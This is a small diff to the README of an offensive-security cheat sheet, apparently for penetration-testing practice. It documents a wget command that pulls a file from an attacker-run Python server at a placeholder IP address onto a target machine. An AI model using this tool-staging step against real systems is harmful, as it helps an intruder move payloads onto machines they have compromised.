Totes5706/Offensive-Security-Cheat-Sheet/README.md

 # About: A command used to download files on the current machine
 # Download: Pre-installed on Kali Linux

-# Download files on the remote machine
+# Usage - Download on server machine
 wget http://{IP ADDRESS}/{FILE} -outfile {FILE}

 # {IP ADDRESS}: Python Server IP Address from step one